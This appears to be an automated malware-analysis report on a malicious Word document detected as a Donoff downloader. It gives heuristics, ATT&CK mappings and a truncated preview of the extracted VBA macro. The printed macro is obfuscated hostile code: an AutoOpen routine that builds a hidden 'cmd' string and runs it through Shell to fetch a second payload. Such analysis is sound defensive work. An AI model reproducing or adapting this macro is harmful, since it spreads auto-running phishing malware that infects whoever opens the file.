MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection name 'Doc.Downloader.Donoff-6666920-0' further supports its nature as a downloader. The macro's obfuscated nature and reliance on Shell() suggest it is designed to fetch and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Donoff-6666920-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-6666920-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25032 bytes |
SHA-256: eb8d6c1cddfe7f3dc1593694339ce8289275386a1a8395eada89db9042b67cfe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aADKbChjVmOC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Cos(hDACzF - tBJrN)
TypeName QLRAiJ
TypeName CInt(wdYNvE + bhJdEU + 22172 / NoJZQz)
TypeName CLng(37593 * 48944)
TypeName Oct(rPcQD / EUYZCr - 99240 / TwGCM)
VBA.Shell# KeyString(MOFAUSiFMz + droPrjWXAJoA + vbKeyC + JESAGEphonuEB + DfPmJnTclq) + UVCaFvc + nMqstvDAVnf + sLuFS + DSWfrS + hmNOs + zzjuaW + UJowB + BdDlS + pUGHU + uzrlWk + dpWYXWVt + rUOwZZok + YzFBAiNtl + NzCzHm + iClGfGDAcTT + wRZLrhKjEvt + JkzBhOoNzml + SmjdGfCjKwTf + wQFjAAmLLwJ, 703878661 - 703878661
TypeName CSng(wJQMFs - zpjZr)
TypeName sPDYU
End Sub
Attribute VB_Name = "zpwjoXzGbjUFh"
Function sLuFS()
On Error Resume Next
TypeName 63
TypeName Sin(tibdZ)
TypeName 176
dTLEYnoCv = "m" + "d " + "/V" + ":O" + "/" + CStr(Chr(idHMFFazITF + BUuVULUqcWTS + 67 + zDKqIOELslvAm + jKJadVmdNmzznF)) + " " + " " + " " + CStr(Chr(uXScuzdzNhpbJ + YGwtMJrFR + 34 + zDKRRFmzBd + zlhLMvjKUnTY)) + "set" + " nx"
TypeName hPOQz
TypeName CDate(325766200)
czasYiXbBdf = "=" + "h" + "H" + "k" + "K" + "JTz" + "QKK" + CStr(Chr(MtdCSBRUzZnwQ + LYpFVwIfwfJlB + 67 + kmaatsTw + TflHYPfwU)) + "j" + "b" + "YEz" + "u" + CStr(Chr(iTUtDOfWI + OpoAVpqws + 108 + mCRWXZPdojz + SGjpinc)) + "Ed"
TypeName Hex(WJzTJ)
TypeName TjKcs
buHQMRV = "j" + CStr(Chr(DQwSXup + PoAjSchqFG + 99 + jRtiiPJASFz + wBaECVnjIhGF)) + "uz" + "J" + "kTT" + "m" + "Dza" + "pG" + "dEA" + "K3"
TypeName Atn(MvkjUB)
TypeName ChrB(jiGHjc * hntCH - nvAtR / QpLkr)
TypeName Cos(67)
NnMHow = "y{t" + "' " + "M" + "x" + "We" + "f" + "wv6" + "F" + "(ro" + "@+"
TypeName CBool(OpnNm)
TypeName Atn(zmhdup)
IPMUMtPM = "}/" + "." + "snR" + "$" + "7:9" + "N" + "P" + ";" + "-" + "=Z\"
TypeName 3097
TypeName zVZAj
TypeName CDate(9)
nkFCMtuflua = CStr(Chr(EInhVXbUzCkpf + FKrYwUa + 76 + DlrrajmcvbEs + cDJdBXUNqH)) + "Sg" + ",i" + "B)&" + "&f" + "or " + "%" + "Q" + " i"
TypeName Sgn(320524144)
TypeName uOiwa
TypeName Tan(346)
flVQmD = "n" + " " + " (" + " " + " " + " " + "32 " + " " + ", " + " " + "55 " + " ," + " "
TypeName Hex(2482)
TypeName oVIJw
qFOZvWzEsza = " " + " " + " 4" + "9 " + ", " + " " + "47" + " " + "," + " 5" + "4" + " " + ", "
TypeName 53
TypeName 8604
JuuEDzjiT = " " + " 6" + "1" + " " + ", " + " " + "0, " + "47" + ",17"
TypeName Hex(fUffM + UiBlSU)
TypeName owUWAu
TypeName CDate(CXDfU * whKWcN + BVbOj / Ppaiwl)
ItwpfDslP = " " + " " + " " + "," + " " + "1" + "7" + " " + " " + ", " + " "
TypeName Sqr(82723 - Jrlcw * JDzNS / aWiiz)
TypeName Rnd(255)
TypeName Fix(8597)
wIoqhzz = " " + "43" + " ," + "64" + ",75" + " " + "," + " " + " " + "75 " + " " + " " + ","
TypeName Chr(88161 + KIkpz + SOGiUF + EmqQZu)
TypeName Atn(22616 - WwoVvi + 36047 / BPVaU)
TypeName Log(3)
LVrzs = " 1" + "7 " + "," + " " + "7" + "2" + " " + ", " + "62" + " " + " ," + "4"
TypeName bjwMf
TypeName Tan(33229 - ZMcMPK)
mcTOOD = "7 ," + " " + " 4" + "9 " + " " + ", " + "71 " + ",55" + " " + " ," + " 1" + "2" + " "
sLuFS = dTLEYnoCv + czasYiXbBdf + buHQMRV + NnMHow + IPMUMtPM + nkFCMtuflua + flVQmD + qFOZvWzEsza + JuuEDzjiT + ItwpfDslP + wIoqhzz + LVrzs + mcTOOD
TypeName CDbl(dNrLGX)
TypeName Hex(92042 / TFlzz + jwwiG + 12894)
TypeName Sin(bSqWiR)
End Function
Function DSWfrS()
On Error Resume Next
TypeName CBool(jbqAd * UISYDn / UvvzQz + BAziwK)
TypeName Sqr(523378403)
vLqBT = "," + "2" + "0 " + " " + " ," + " " + " 47" + " " + " , " + " " + "21" + ", 4" + "1,"
TypeName hobimD
TypeName 91
TypeName Int(SSwzTa)
EhbwjLzTH = " " + "43 " + " , " + " " + " " + "6" + "8 " + " " + " , " + "4" + "7"
TypeName Oct(53834 * nGqoz)
TypeName bMDTiK
ktkhi = "," + " 4" + "1" + " " + ", " + " 6"
TypeName CDbl(83575 - LsirT / zhsEh * jTE
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.